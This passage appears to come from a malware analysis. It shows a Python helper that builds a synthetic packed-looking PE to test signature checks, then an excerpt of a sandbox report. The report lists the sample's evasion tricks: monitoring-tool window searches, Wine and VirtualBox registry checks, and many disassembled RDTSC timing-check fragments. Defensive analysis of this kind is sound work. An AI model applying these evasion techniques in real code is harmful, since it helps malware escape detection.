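        findings.append(f"invalid checksum: real 0x{pe['stored_checksum']:x} should be 0x{computed:x}")
    return findings


def build_test_pe(sections, entry_rva: int, checksum: int = 0) -> bytes:
    """Constructed minimal PE32 for testing (not the sample); sections is a list of
    (name, rva, raw_bytes, characteristics), file alignment 0x200."""
    align, e_lfanew, opt_size = 0x200, 0x40, 224
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H14xI", opt, 0, 0x10B, entry_rva)                 # Magic, AddressOfEntryPoint
    struct.pack_into("<III24xI", opt, 28, 0x400000, 0x1000, align, checksum)  # ImageBase .. CheckSum
    table, body, raw_ptr = b"", b"", align
    for name, rva, raw, chars in sections:
        padded = raw + b"\0" * (-len(raw) % align)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw), rva,
                             len(padded), raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += len(padded)
        body += padded
    headers = dos + b"PE\0\0" + coff + bytes(opt) + table
    return headers + b"\0" * (align - len(headers)) + body


# Layout borrowed from the report (xisdcata, .taggant, entry point inside .taggant); the
# bytes are made up: a full byte alphabet gives xisdcata entropy 8.0, 0xE0000040 makes it W+X.
TEST_SECTIONS = [(".text", 0x1000, b"\xc3" * 64, 0x60000020),
                 ("xisdcata", 0x2000, bytes(range(256)) * 8, 0xE0000040),
                 (".taggant", 0x3000, b"\x90" * 64, 0x60000020)]
PACKED_LIKE = build_test_pe(TEST_SECTIONS, entry_rva=0x3000)
```

static_findings(PACKED_LIKE) returns one line per signature, in the same wording the report uses for the checksum ("real 0x... should be 0x..."). Because the CheckSum field is skipped while summing, writing the computed value back into the header and re-running the check yields no checksum finding, which is exactly why a packer that rewrites sections without recomputing the field leaves the mismatch the report flags.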

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13265)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A2269 second address: 5A2286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618479h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A2286 second address: 5A228A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 715A53 second address: 715A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jp 00007FCA94618468h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 715A76 second address: 715A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 715A7C second address: 715A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 715D74 second address: 715D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 715EB6 second address: 715EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 71879C second address: 718833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E43h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, B2F7h 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D3700h] 0x0000001a push CF2C7F56h 0x0000001f jmp 00007FCA94C93E3Dh 0x00000024 add dword ptr [esp], 30D3812Ah 0x0000002b mov si, 2FFCh 0x0000002f push 00000003h 0x00000031 mov dx, 6C48h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FCA94C93E38h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 ja 00007FCA94C93E3Ch 0x00000057 mov ecx, esi 0x00000059 push 00000003h 0x0000005b mov dword ptr [ebp+122D17EFh], eax 0x00000061 push C0CF035Ch 0x00000066 jl 00007FCA94C93E4Bh 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 718911 second address: 718915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 718915 second address: 71891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 71891F second address: 718923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 718B2B second address: 718B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCA94C93E3Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 70775B second address: 707761 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 736F87 second address: 736F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 737262 second address: 73726C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 73726C second address: 73727C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94C93E3Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 737808 second address: 73780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 737936 second address: 73794D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA94C93E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jbe 00007FCA94C93E36h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737D97 second address: 737D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737D9D second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711770 second address: 711777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73804C second address: 73805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007FCA94C93E3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73805D second address: 738063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738063 second address: 738068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738068 second address: 738089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FCA9461846Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F2B5 second address: 73F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F2B9 second address: 73F2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E873 second address: 73E877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74454D second address: 744566 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FCA94618468h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744703 second address: 744709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744C38 second address: 744C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744DF7 second address: 744E27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FCA94C93E42h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FCA94C93E3Dh 0x00000018 popad 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744F9C second address: 744FB8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94618466h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FCA9461846Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744FB8 second address: 744FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746F85 second address: 746F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746F8E second address: 746F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746F92 second address: 746FFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007FCA94618477h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FCA9461846Eh 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e jmp 00007FCA94618478h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FCA94618472h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746FFE second address: 747003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747720 second address: 747768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FCA94618477h 0x0000000f jmp 00007FCA94618471h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA94618470h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747768 second address: 747772 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747772 second address: 747779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747832 second address: 747850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E49h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747850 second address: 747856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74804C second address: 748052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1DC second address: 74A1F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94618468h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1F1 second address: 74A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749A00 second address: 749A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA9461846Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C361 second address: 74C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B591 second address: 74B596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C366 second address: 74C36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C36C second address: 74C370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750AAA second address: 750AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750AB0 second address: 750AC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jnp 00007FCA9461846Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A58 second address: 751A6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA94C93E38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A6A second address: 751A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A70 second address: 751A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A75 second address: 751A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A7B second address: 751A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752984 second address: 752A16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618476h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCA94618471h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FCA94618468h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D36A0h] 0x00000032 push 00000000h 0x00000034 mov ebx, eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FCA94618468h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 sub edi, 278B471Fh 0x00000058 push eax 0x00000059 push edi 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FCA94618473h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7548C0 second address: 7548CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751C36 second address: 751CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCA94618468h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jno 00007FCA9461846Ch 0x0000002b push dword ptr fs:[00000000h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FCA94618468h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xor bx, CEABh 0x00000051 mov dword ptr fs:[00000000h], esp 0x00000058 mov edi, dword ptr [ebp+122D18DEh] 0x0000005e mov eax, dword ptr [ebp+122D0929h] 0x00000064 mov edi, dword ptr [ebp+122D3748h] 0x0000006a push FFFFFFFFh 0x0000006c mov di, dx 0x0000006f nop 0x00000070 jmp 00007FCA9461846Eh 0x00000075 push eax 0x00000076 push ebx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BBF second address: 752BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753AB4 second address: 753ABE instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA9461846Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7549E4 second address: 754A0A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94C93E49h 0x00000008 jmp 00007FCA94C93E43h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BC3 second address: 752BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753ABE second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ebx, ax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FCA94C93E38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D35FEh], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007FCA94C93E3Fh 0x0000003f mov eax, dword ptr [ebp+122D0A2Dh] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FCA94C93E38h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f jno 00007FCA94C93E37h 0x00000065 mov bx, FDB2h 0x00000069 push FFFFFFFFh 0x0000006b xor dword ptr [ebp+122D31ADh], esi 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FCA94C93E48h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75663A second address: 75663F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754A0A second address: 754A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BC9 second address: 752BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FCA94618466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7566D6 second address: 7566E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BD4 second address: 752C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bl, A9h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov ebx, dword ptr [ebp+12475B95h] 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or edi, 046BF531h 0x00000024 mov eax, dword ptr [ebp+122D0619h] 0x0000002a sub edi, 2FA68224h 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FCA94618468h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c and edi, 50A68970h 0x00000052 mov ebx, dword ptr [ebp+122D374Ch] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007FCA9461846Ch 0x00000061 jp 00007FCA94618466h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756817 second address: 75682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA94C93E36h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75789C second address: 7578A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75682A second address: 756830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756830 second address: 75683A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCA94618466h 0x0000000a rdtsc
